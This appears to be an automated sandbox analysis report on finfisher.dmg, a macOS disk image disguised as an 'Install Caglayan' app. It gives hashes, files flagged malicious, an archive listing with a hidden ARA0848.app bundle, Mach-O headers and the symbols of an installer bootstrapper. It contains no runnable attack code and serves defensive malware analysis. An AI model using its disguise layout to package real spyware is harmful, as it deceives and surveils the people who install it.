SHA1:	84D4BFE8CA4AB465834A07BF423E53C390F5DCD2
SHA-256:	092239CA4F9860B91B125B2B76EC278CF2C0A7BD529863D7ADB58BECD7331F95
SHA-512:	F49A7C2EF0B6029236599DA68DCAA3561B0F1D5956F1E56437CAD751E65F8671E7F3FCD5596DCCEA874DB4F8AAC21E7991BED7A309F35863E521980D32F37BFB
Malicious:	true
Preview:	0......H..........0......1.0...+......0....H.........n0...0..........[.0....H........0_1.0...U....US1.0...U....GeoTrust Inc.1.0...U....Adobe Trust Services1.0...U....Product Services0...131028121920Z..230108080000Z0e1.0...U....Adobe AIR1.0...U....Adobe Trust Services1#0!..U....Adobe Systems Incorporated1.0...U....US0..0....H............0........&.a.m_.u.qJf5......fG...&h......t9...l....O..y...$D....F..A\..&.N.k<...E..l..b.X.@..+.....4 C......H...'9J..a...w.............0...0...U........0...U.%..0....H../...02..U...+0)0'.%.#.!http://crl.adobe.com/prodSvce.crl0...U.......0.0....U. ......0..0.....H../...0..0....+.......0}.{You are not permitted to use this Certificate except as permitted by the license agreement accompanying the Adobe software.0....H..............Ff...K..v.q.......W......F....R.k......x;......,:..,y.g.%./ 9/...P.&3...`}...=h..~...f...e.lvR...f.f"..0...a........;X..<>am...T(....'...u.j...Ud..=B.."6.!...Y..yE...HTfu.6..;...Wn..y.U@.se#..w...)iT..0g...

/private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/prodSvce.crl Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan
File Type:	data
Size (bytes):	425
Entropy (8bit):	7.0555281629065965
Encrypted:	false
MD5:	A01BF1D4623A5BD00BD56ADB1A8B1AF4
SHA1:	09A941989E74261C49621D146C1BECCD819407C8
SHA-256:	006646F42030D990C3C08786E19B8EC683B63C011E7B2C98B1D91A12ACA05DC1
SHA-512:	37DF9879CD5208232BBAB86DBC23DD3DB45D84D7DA1A1F9093D8457A3074385DC4EDD527F19100EBC2E3D888207A144CF0C4E741DC4D9DA172ED71FA622A2BE3
Malicious:	true
Preview:	0...0..0....H........0_1.0...U....US1.0...U....GeoTrust Inc.1.0...U....Adobe Trust Services1.0...U....Product Services..180817052300Z..230109052300Z0....H.............\.......'f.,.qR..+...sn..T.+.c*M.o......e./..e.O. 4..${..c...T.)......8U.)....{O;w..v..l.z#(,%....[......P5...,.....V..gRl.M.5...U..+^.{..L..S.p.dW..0...sd...@{[1...V...}..?....s.m.j...M.......;.e&a."NN};.m...uUb...I;.......X..!@$.d..b2...e

Static File Info

General
File type:	DOS/MBR boot sector; partition 1 : ID=0xee, start-CHS (0x3ff,254,63), end-CHS (0x3ff,254,63), startsector 1, 17856 sectors, extended partition table (last)
Entropy (8bit):	5.494363904429923
TrID:	Disk Image (Macintosh), GPT (6000/0) 32.68% Photoshop Action (5010/6) 27.29% Lotus 123 Worksheet (generic) (2007/4) 10.93% Game Music Creator Music (1131/43) 6.16% MacBinary 1 header (1030/4) 5.61%
File name:	finfisher.dmg
File size:	9142784
MD5:	e734730dcad82a6bd050b0d3b89b44e3
SHA1:	e1df29dcb571fd3296ed4a5d2689178acee355b5
SHA256:	4f3003dd2ed8dcb68133f95c14e28b168bd0f52e5ae9842f528d3f7866495cea
SHA512:	ad040779fa17ab979522be8876d26f815a783e753967c6850c77df0e1f2ae286332092816354a7b3af9bd3926e271e799caf9ccc8e224eee94d720c15c9d1633
SSDEEP:	196608:zjCcw9RvGQ/JyLTRuU3Iv9CbGxztzyGNovWPZ0y:vCRLn/csyECKxzdTovWPey
File Content Preview:	...............................................................................................................................................................................................................................................................

Archive GPT

Archived Files

File Path	File Attributes	File Size
caglayan-macos/Install Caglayan.app/Contents/MacOS/installer		174384
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/_CodeSignature/CodeResources		7000
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Resources/mimetype		59
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/PkgInfo		8
caglayan-macos/.journal		524288
caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/Resources/English.lproj/InfoPlist.strings		92
caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/Info.plist		1355
caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/Resources/data		1410834
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Resources/DesktopReader.swf		2442278
caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/Resources/res		40
caglayan-macos/.journal_info_block		4096
caglayan-macos/Install Caglayan.app/Contents/_CodeSignature/CodeResources		10604
caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/PkgInfo		8
caglayan-macos/Install Caglayan.app/Contents/Resources/NativeInstaller.icns		112624
caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer		228860
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Resources/assets/icons/Icon-16.png		458
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Resources/native-utils/sqlite3		740660
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Resources/assets/info.xml		483
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Resources/META-INF/AIR/hash		32
caglayan-macos/Install Caglayan.app/Contents/MacOS/Install Caglayan		193
caglayan-macos/Install Caglayan.app/Contents/Resources/ErrorDialog.nib		7294
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Info.plist		1279
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Resources/assets/LibraryLogo.png		5183
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Resources/META-INF/AIR/application.xml		1144
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Resources/assets/icons/Icon-32.png		849
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Resources/META-INF/signatures.xml		147880
caglayan-macos/Install Caglayan.app/Contents/Info.plist		1672
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Resources/assets/accent-map.json		5533
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Resources/Icon.icns		84612
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Resources/assets/icons/Icon-48.png		1291
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Resources/assets/icons/Icon-128.png		3422
caglayan-macos/Install Caglayan.app/Contents/PkgInfo		8
caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/Resources/English.lproj/MainMenu.nib		1149
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/MacOS/Caglayan		41312
caglayan-macos/Install Caglayan.app/Contents/Resources/Caglayan/Contents/Resources/assets/icons/Icon-desktop.png		11406
caglayan-macos/Install Caglayan.app/Contents/Resources/Config.plist		297
caglayan-macos/Install Caglayan.app/Contents/Resources/MainMenu.nib		8564

Extracted Files

Extracted File
File path:	caglayan-macos/Install Caglayan.app/Contents/MacOS/installer
File size:	174384
File type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|BINDS_TO_WEAK>

Static Mach Info

General Information for header 1
Endian:	<
Size:	64-bit
Architecture:	x86_64
Filetype:	execute
Nbr. of load commands:	23
Entry point:	0x100001600

segment_command_64 aggregated: 4

Name	Value
segname	__PAGEZERO
vmaddr	0x0
vmsize	0x100000000
fileoff	0x0
filesize	0x0
maxprot	0x0
initprot	0x0
nsects	0
flags	0x0

Name

Value

segname

__TEXT

vmaddr

0x100000000

vmsize

0x1B000

fileoff

0x0

filesize

0x1B000

maxprot

0x7

initprot

0x5

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	align	reloff	nreloc	flags
__text	__TEXT	0x100001600	0x4CE9	0x1600	0x4	0x0	0	0x80000400
__stubs	__TEXT	0x1000062EA	0x1A4	0x62EA	0x1	0x0	0	0x80000408
__stub_helper	__TEXT	0x100006490	0x2CC	0x6490	0x2	0x0	0	0x80000400
__gcc_except_tab	__TEXT	0x10000675C	0x7C	0x675C	0x2	0x0	0	0x0
__objc_methname	__TEXT	0x1000067D8	0x105A	0x67D8	0x0	0x0	0	0x2
__cstring	__TEXT	0x100007840	0xBEA	0x7840	0x4	0x0	0	0x2
__objc_classname	__TEXT	0x10000842A	0x55	0x842A	0x0	0x0	0	0x2
__objc_methtype	__TEXT	0x10000847F	0xAAE	0x847F	0x0	0x0	0	0x2
__const	__TEXT	0x100008F30	0x107CA	0x8F30	0x4	0x0	0	0x0
__unwind_info	__TEXT	0x1000196FA	0x1B4	0x196FA	0x0	0x0	0	0x0
__eh_frame	__TEXT	0x1000198B0	0x1750	0x198B0	0x3	0x0	0	0x0

Name

Value

segname

__DATA

vmaddr

0x10001B000

vmsize

0x3000

fileoff

0x1B000

filesize

0x3000

maxprot

0x7

initprot

0x3

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	align	reloff	nreloc	flags
__program_vars	__DATA	0x10001B000	0x28	0x1B000	0x5	0x0	0	0x0
__nl_symbol_ptr	__DATA	0x10001B028	0x10	0x1B028	0x3	0x0	0	0x6
__got	__DATA	0x10001B038	0x60	0x1B038	0x3	0x0	0	0x6
__la_symbol_ptr	__DATA	0x10001B098	0x230	0x1B098	0x3	0x0	0	0x7
__mod_init_func	__DATA	0x10001B2C8	0x8	0x1B2C8	0x3	0x0	0	0x9
__objc_classlist	__DATA	0x10001B2D0	0x28	0x1B2D0	0x3	0x0	0	0x10000000
__objc_imageinfo	__DATA	0x10001B2F8	0x8	0x1B2F8	0x2	0x0	0	0x0
__objc_const	__DATA	0x10001B300	0xEE0	0x1B300	0x3	0x0	0	0x0
__objc_selrefs	__DATA	0x10001C1E0	0x528	0x1C1E0	0x3	0x0	0	0x10000005
__objc_msgrefs	__DATA	0x10001C710	0xC0	0x1C710	0x4	0x0	0	0x0
__objc_classrefs	__DATA	0x10001C7D0	0xE0	0x1C7D0	0x3	0x0	0	0x10000000
__objc_superrefs	__DATA	0x10001C8B0	0x18	0x1C8B0	0x3	0x0	0	0x10000000
__objc_data	__DATA	0x10001C8C8	0x190	0x1C8C8	0x3	0x0	0	0x0
__data	__DATA	0x10001CA60	0x728	0x1CA60	0x4	0x0	0	0x0
__objc_ivar	__DATA	0x10001D188	0x110	0x1D188	0x3	0x0	0	0x0
__cfstring	__DATA	0x10001D298	0x660	0x1D298	0x3	0x0	0	0x0
__const	__DATA	0x10001D900	0x58	0x1D900	0x4	0x0	0	0x0
__common	__DATA	0x10001D958	0x11	0x0	0x1	0x0	0	0x1
__bss	__DATA	0x10001D970	0x18	0x0	0x3	0x0	0	0x1

Name	Value
segname	__LINKEDIT
vmaddr	0x10001E000
vmsize	0xD000
fileoff	0x1E000
filesize	0xC930
maxprot	0x7
initprot	0x1
nsects	0
flags	0x0

dyld_info_command aggregated: 1

Name	Value
rebase_off	0
rebase_size	0
bind_off	122880
bind_size	1672
weak_bind_off	124552
weak_bind_size	16
lazy_bind_off	124568
lazy_bind_size	1656
export_off	126224
export_size	112

symtab_command aggregated: 1

Name	Value
symoff	126528
nsyms	961
stroff	142520
strsize	20120

dysymtab_command aggregated: 1

Name	Value
ilocalsym	0
nlocalsym	838
iextdefsym	838
nextdefsym	6
iundefsym	844
nundefsym	117
tocoff	0
ntoc	0
modtaboff	0
nmodtab	0
extrefsymoff	0
nextrefsyms	0
indirectsymoff	141904
nindirectsyms	154
extreloff	0
nextrel	0
locreloff	0
nlocrel	0

dylinker_command aggregated: 1

Name

Value

name

Datas

/usr/lib/dyld

uuid_command aggregated: 1

Name	Value
uuid	b'16\x1eArf1F\x95+\xe2\x0b\xfct\xaf\xb9'

version_min_command aggregated: 1

Name	Value
version	656896
sdk	656896

thread_command aggregated: 1

Name	Value
flavor	4
count	42

dylib_command aggregated: 9

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

15.0.0

compatibility_version

1.0.0

Datas

/System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

751.62.0

compatibility_version

300.0.0

Datas

/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

0.9.8

compatibility_version

0.9.8

Datas

/usr/lib/libcrypto.0.9.8.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

7.9.0

compatibility_version

7.0.0

Datas

/usr/lib/libstdc++.6.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

125.2.11

compatibility_version

1.0.0

Datas

/usr/lib/libSystem.B.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

550.43.0

compatibility_version

150.0.0

Datas

/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

44.0.0

compatibility_version

1.0.0

Datas

/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1038.36.0

compatibility_version

45.0.0

Datas

/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

227.0.0

compatibility_version

1.0.0

Datas

/usr/lib/libobjc.A.dylib

linkedit_data_command aggregated: 3

Name	Value
dataoff	126336
datasize	192

Name	Value
dataoff	126528
datasize	0

Name	Value
dataoff	162640
datasize	11744

Internal Symbols

+[LocalizedStrings getEmbeddedMessage:]

+[SignatureVerification extractX509v3Data:opensslNid:]

-[Bootstrapper appName]

-[Bootstrapper applicationDidFinishLaunching:]

-[Bootstrapper cleanupAndExit:errCode:exitMessage:]

-[Bootstrapper dealloc]

-[Bootstrapper handleDownloaderDone:files:]

-[Bootstrapper handleSignatureDone:signatureVerifier:]

-[Bootstrapper init]

-[Bootstrapper installWithInstaller:args:]

-[Bootstrapper installWithRuntime:args:]

-[Bootstrapper localizedWindowTitle]

-[Bootstrapper markAsExecutable:]

-[Bootstrapper notifyDownloaderDone:]

-[Bootstrapper notifySignatureDone:]

-[Bootstrapper okAlert:]

-[Bootstrapper setAppName:]

-[Bootstrapper setLocalizedWindowTitle:]

-[Bootstrapper showDialog:]

-[Downloader cleanupTempFiles]

-[Downloader currentProgressPercent]

-[Downloader dealloc]

-[Downloader doingDownload:]

-[Downloader download:decideDestinationWithSuggestedFilename:]

-[Downloader download:didCreateDestination:]

-[Downloader download:didFailWithError:]

-[Downloader download:didReceiveDataOfLength:]

-[Downloader download:didReceiveResponse:]

-[Downloader download:shouldDecodeSourceDataOfMIMEType:]

-[Downloader download:willSendRequest:redirectResponse:]

-[Downloader downloadDidFinish:]

-[Downloader ignoreFailures]

-[Downloader init]

-[Downloader lastError]

-[Downloader localizedCancel]

-[Downloader localizedPleaseWait]

-[Downloader resetProgress]

-[Downloader runtimeArgs]

-[Downloader sendDoneNotfication:]

-[Downloader setCurrentProgressPercent:]

-[Downloader setDownloadResponse:]

-[Downloader setIgnoreFailures:]

-[Downloader setLastError:]

-[Downloader setLocalizedCancel:]

-[Downloader setLocalizedPleaseWait:]

-[Downloader setRuntimeArgs:]

-[Downloader setSilent:]

-[Downloader setUrlStrings:]

-[Downloader silent]

-[Downloader startDownload:]

-[Downloader stopDownLoad:]

-[Downloader urlStrings]

-[ErrorDialogController OK:]

-[ErrorDialogController setMessage:andSetLocalizedOKText:andSetAppName:]

-[SignatureVerification checkCertsAgainstCrls]

-[SignatureVerification containsX509v3Data:expectedString:opensslNid:]

-[SignatureVerification dealloc]

-[SignatureVerification errorString]

-[SignatureVerification getAdobeRoot]

-[SignatureVerification getSignerCertificate:]

-[SignatureVerification getTrustedCerts]

-[SignatureVerification handleDownloaderDone:files:]

-[SignatureVerification hasCertificateBeenRevoked:store:chain:]

-[SignatureVerification init]

-[SignatureVerification makeStoreForPkcs7]

-[SignatureVerification notifyDownloaderDone:]

-[SignatureVerification readCertificateFromPath:]

-[SignatureVerification readCrlFromPath:]

-[SignatureVerification readPkcs7]

-[SignatureVerification sendNotificationOfResult:]

-[SignatureVerification setCrlPaths:]

-[SignatureVerification setDataPath:]

-[SignatureVerification setDownloader:]

-[SignatureVerification setErrorString:]

-[SignatureVerification setSignaturePath:]

-[SignatureVerification startFetchingCrlsOnSignature]

-[SignatureVerification verifyDataAtPath:detachedSignatureAtPath:]

-[SignatureVerification verifyDetachedSignature:]

-[SignatureVerification verifySignerName:expectedString:opensslNid:]

-[SignatureVerification verifySignerNames:]

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/Bootstrapper.o

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/Downloader.o

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/ErrorDialogController.o

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/LocalizedStrings.o

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/NAIB.o

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/ParamChecker.o

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/SignatureVerification.o

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/main.o

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/Release/libinstall.a(InstallLogMsgs.o)

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/Release/libinstall.a(LibInstall.o)

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/Release/libinstall.a(MacInstall.o)

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/Release/libinstall.a(SharedMacUtils.o)

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/LibInstall/platform/OSX/../../../../shared/platform/mac/

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/LibInstall/platform/OSX/../../../../shared/platform/mac/SharedMacUtils.h

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/LibInstall/platform/OSX/Mac/

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/LibInstall/src/

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/LibInstall/src/LibInstall.h

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/Runtime/Core/include/runtime/mac/embeddedmessages.h

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/SDK/NativeAppInstallBootstrapper/generic/

/Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/SDK/NativeAppInstallBootstrapper/mac/

Bootstrapper.mm

Downloader.mm

ErrorDialogController.mm

GCC_except_table2

GCC_except_table3

InstallLogMsgs.cpp

LibInstall.cpp

LocalizedStrings.mm

MacInstall.cpp

NAIB.cpp

ParamChecker.cpp

SharedMacUtils.mm

SignatureVerification.mm

_ASN1_STRING_to_UTF8

_BIO_ctrl

_BIO_free

_BIO_new

_BIO_new_file

_BIO_new_mem_buf

_BIO_s_mem

_CFStringConvertEncodingToNSStringEncoding

_CRYPTO_free

_ERR_load_crypto_strings

_NSApp

_NSApplicationMain

_NSFilePosixPermissions

_NSForegroundColorAttributeName

_NSHomeDirectory

_NSLinkAttributeName

_NSRunAlertPanel

_NSSearchPathForDirectoriesInDomains

_NSSelectorFromString

_NSTemporaryDirectory

_NSURLErrorDomain

_NSURLErrorFailingURLStringErrorKey

_NSUnderlineStyleAttributeName

_NXArgc

_NXArgv

_OBJC_CLASS_$_Bootstrapper

_OBJC_CLASS_$_Downloader

_OBJC_CLASS_$_ErrorDialogController

_OBJC_CLASS_$_LocalizedStrings

_OBJC_CLASS_$_NSArray

_OBJC_CLASS_$_NSAttributedString

_OBJC_CLASS_$_NSAutoreleasePool

_OBJC_CLASS_$_NSBundle

_OBJC_CLASS_$_NSColor

_OBJC_CLASS_$_NSDictionary

_OBJC_CLASS_$_NSFileManager

_OBJC_CLASS_$_NSLocale

_OBJC_CLASS_$_NSMutableArray

_OBJC_CLASS_$_NSMutableAttributedString

_OBJC_CLASS_$_NSMutableSet

_OBJC_CLASS_$_NSMutableString

_OBJC_CLASS_$_NSNotification

_OBJC_CLASS_$_NSNotificationCenter

_OBJC_CLASS_$_NSNotificationQueue

_OBJC_CLASS_$_NSNumber

_OBJC_CLASS_$_NSObject

_OBJC_CLASS_$_NSProcessInfo

_OBJC_CLASS_$_NSPropertyListSerialization

_OBJC_CLASS_$_NSScanner

_OBJC_CLASS_$_NSString

_OBJC_CLASS_$_NSTask

_OBJC_CLASS_$_NSURL

_OBJC_CLASS_$_NSURLDownload

_OBJC_CLASS_$_NSURLRequest

_OBJC_CLASS_$_NSUserDefaults

_OBJC_CLASS_$_NSWindowController

_OBJC_CLASS_$_SignatureVerification

_OBJC_IVAR_$_Bootstrapper.appName

_OBJC_IVAR_$_Bootstrapper.appPath

_OBJC_IVAR_$_Bootstrapper.config

_OBJC_IVAR_$_Bootstrapper.downloader

_OBJC_IVAR_$_Bootstrapper.exePath

_OBJC_IVAR_$_Bootstrapper.installerLaunchPath

_OBJC_IVAR_$_Bootstrapper.localizedWindowTitle

_OBJC_IVAR_$_Downloader.bytesReceived

_OBJC_IVAR_$_Downloader.cancelButton

_OBJC_IVAR_$_Downloader.cleanupPaths

_OBJC_IVAR_$_Downloader.currentProgressPercent

_OBJC_IVAR_$_Downloader.currentUrlIndex

_OBJC_IVAR_$_Downloader.expectedBytes

_OBJC_IVAR_$_Downloader.ignoreFailures

_OBJC_IVAR_$_Downloader.lastError

_OBJC_IVAR_$_Downloader.localizedCancel

_OBJC_IVAR_$_Downloader.localizedPleaseWait

_OBJC_IVAR_$_Downloader.notificationName

_OBJC_IVAR_$_Downloader.progressBar

_OBJC_IVAR_$_Downloader.progressWindow

_OBJC_IVAR_$_Downloader.resultPaths

_OBJC_IVAR_$_Downloader.runtimeArgs

_OBJC_IVAR_$_Downloader.silent

_OBJC_IVAR_$_Downloader.urlDownload

_OBJC_IVAR_$_Downloader.urlResponse

_OBJC_IVAR_$_Downloader.urlStrings

_OBJC_IVAR_$_ErrorDialogController.okButton

_OBJC_IVAR_$_ErrorDialogController.textView

_OBJC_IVAR_$_SignatureVerification.crlPaths

_OBJC_IVAR_$_SignatureVerification.dataPath

_OBJC_IVAR_$_SignatureVerification.downloader

_OBJC_IVAR_$_SignatureVerification.errorString

_OBJC_IVAR_$_SignatureVerification.signaturePath

_OBJC_IVAR_$_SignatureVerification.startedFetchingCrls

_OBJC_METACLASS_$_Bootstrapper

_OBJC_METACLASS_$_Downloader

_OBJC_METACLASS_$_ErrorDialogController

_OBJC_METACLASS_$_LocalizedStrings

_OBJC_METACLASS_$_NSObject

_OBJC_METACLASS_$_NSWindowController

_OBJC_METACLASS_$_SignatureVerification

_OPENSSL_add_all_algorithms_noconf

_PEM_read_bio_X509

_PEM_read_bio_X509_CRL

_PKCS7_free

_PKCS7_get0_signers

_PKCS7_verify

_X509V3_EXT_print

_X509_CRL_free

_X509_NAME_ENTRY_get_data

_X509_NAME_get_entry

_X509_NAME_get_index_by_NID

_X509_STORE_CTX_free

_X509_STORE_CTX_get_current_cert

_X509_STORE_CTX_init

_X509_STORE_CTX_new

_X509_STORE_add_cert

_X509_STORE_add_crl

_X509_STORE_free

_X509_STORE_new

_X509_STORE_set_flags

_X509_STORE_set_purpose

_X509_dup

_X509_free

_X509_get_ext

_X509_get_ext_by_NID

_X509_get_subject_name

_X509_verify_cert

_X509_verify_cert_error_string

__GLOBAL__I_a

__Unwind_Resume

__Z10DebugTracePKcz

__Z14verifyCallbackiP17x509_store_ctx_st

__Z15wchartoNSStringPKw

__Z16FindMessageIndexP8NSStringRb

__Z22ObtainMacSystemVersionPjS_S_

__Z25GetFatalErrorMessageIndexv

__ZL11AirRootCert

__ZL13callbackError

__ZL19callbackErrorNumber

__ZL20embeddedStringLocale

__ZL9certChain

__ZN16MacSystemVersion16GetSystemVersionEv

__ZN16MacSystemVersion20sCachedSystemVersionE

__ZN16MacSystemVersion30sMacSystemVersionUninitializedE

__ZN4naib12ParamChecker14GetOrigUtf8ArgEj

__ZN4naib12ParamChecker15GetOrigArgCountEv

__ZN4naib12ParamChecker19PutValidatedUtf8ArgEPKcb

__ZN4naib12ParamChecker27PutRuntimeInstallerUtf8PathEPKc

__ZN4naib12ParamCheckerC1EP7NSArray

__ZN4naib12ParamCheckerC2EP7NSArray

__ZN4naib12ParamCheckerD0Ev

__ZN4naib12ParamCheckerD1Ev

__ZN4naib16ParamCheckerCore11CheckParamsERbS1_RNS_13NAIBErrorCodeE

__ZN4naib16ParamCheckerCore27PrintNeedsAllowDownloadFlagEv

__ZN7install10installLogENS_10severity_tEPKcz

__ZN7install11logSigValidEPKc

__ZN7install12_logToStdoutE

__ZN7install13logSigInvalidEPKc

__ZN7install15logDownloadDestEPKc

__ZN7install15runAppInstallerEP7NSArray

__ZN7install16canUpdateRuntimeEv

__ZN7install16logDownloadBeginEPKcS1_

__ZN7install17getRuntimeVersionERNS_18RuntimeVersionInfoE

__ZN7install17logApplicationEndEbPKci

__ZN7install17logCertChainBeginEv

__ZN7install17logDownloadCancelEv

__ZN7install18getRuntimeLocationEv

__ZN7install18logDownloadFailureEPKc

__ZN7install18logDownloadSuccessEv

__ZN7install18logSubprocessBeginEPKc

__ZN7install19logApplicationBeginEPKcS1_S1_S1_

__ZN7install19logCertChainFailureEv

__ZN7install19logCertChainSuccessEv

__ZN7install19logRuntimeInstalledEiiiiPKc

__ZN7install19platform_installLogENS_10severity_tEPKcP13__va_list_tag

__ZN7install20logSubprocessFailureEPKci

__ZN7install20logSubprocessSuccessEPKc

__ZN7install21sAllowDownloadFlagMsgE

__ZN7install22logCertRevocationFoundEv

__ZN7install22logRuntimeNotInstalledEv

__ZN7install23logCouldNotLocateAppDirEPKc

__ZN7install23platform_getFileVersionEPKcRNS_18RuntimeVersionInfoE

__ZN7install24platform_getPlatformInfoERNS_12PlatformInfoE

__ZN7install26logImmediateUpdateDisabledEv

__ZN7install26platform_getRuntimeVersionERNS_18RuntimeVersionInfoE

__ZN7install27getBootstrapperDownloadUrlsEPcmS0_m

__ZN7install27logMissingAllowDownloadFlagEv

__ZN7install30platform_getConfigurationValueEPKc

__ZN7install33platform_updateDisabledFileExistsEv

__ZNK4naib12ParamChecker10ParamArrayEv

__ZSt9terminatev

__ZTIN4naib12ParamCheckerE

__ZTIN4naib16ParamCheckerCoreE

__ZTSN4naib12ParamCheckerE

__ZTSN4naib16ParamCheckerCoreE

__ZTVN10__cxxabiv117__class_type_infoE

__ZTVN10__cxxabiv120__si_class_type_infoE

__ZTVN4naib12ParamCheckerE

__ZdlPv

___CFConstantStringClassReference

___gxx_personality_v0

___progname

___stack_chk_fail

___stack_chk_guard

___stdoutp

__mh_execute_header

__objc_empty_cache

__objc_empty_vtable

_allMessages

_d2i_PKCS7_bio

_d2i_X509_CRL_bio

_d2i_X509_bio

_environ

_exit

_fflush

_fputc

_fwrite

_main

_memcmp

_objc_msgSend

_objc_msgSendSuper2

_objc_msgSend_fixup

_objc_msgSend_stret

_puts

_sk_new_null

_sk_num

_sk_pop

_sk_pop_free

_sk_push

_sk_value

_snprintf

_strlen

_strstr

_vfprintf

_vsyslog

dyld_stub_binder

main.m

start

External symbols

_ASN1_STRING_to_UTF8

_BIO_ctrl

_BIO_free

_BIO_new

_BIO_new_file

_BIO_new_mem_buf

_BIO_s_mem

_CFStringConvertEncodingToNSStringEncoding

_CRYPTO_free

_ERR_load_crypto_strings

_NSApplicationMain

_NSHomeDirectory

_NSRunAlertPanel

_NSSearchPathForDirectoriesInDomains

_NSSelectorFromString

_NSTemporaryDirectory

_OPENSSL_add_all_algorithms_noconf

_PEM_read_bio_X509

_PEM_read_bio_X509_CRL

_PKCS7_free

_PKCS7_get0_signers

_PKCS7_verify

_X509V3_EXT_print

_X509_CRL_free

_X509_NAME_ENTRY_get_data

_X509_NAME_get_entry

_X509_NAME_get_index_by_NID

_X509_STORE_CTX_free

_X509_STORE_CTX_get_current_cert

_X509_STORE_CTX_init

_X509_STORE_CTX_new

_X509_STORE_add_cert

_X509_STORE_add_crl

_X509_STORE_free

_X509_STORE_new

_X509_STORE_set_flags

_X509_STORE_set_purpose

_X509_dup

_X509_free

_X509_get_ext

_X509_get_ext_by_NID

_X509_get_subject_name

_X509_verify_cert

_X509_verify_cert_error_string

__Unwind_Resume

__ZSt9terminatev

___stack_chk_fail

_d2i_PKCS7_bio

_d2i_X509_CRL_bio

_d2i_X509_bio

_exit

_fflush

_fputc

_fwrite

_memcmp

_objc_msgSendSuper2

_objc_msgSend_stret

_puts

_sk_new_null

_sk_num

_sk_pop

_sk_pop_free

_sk_push

_sk_value

_snprintf

_strlen

_strstr

_vfprintf

_vsyslog

Extracted File
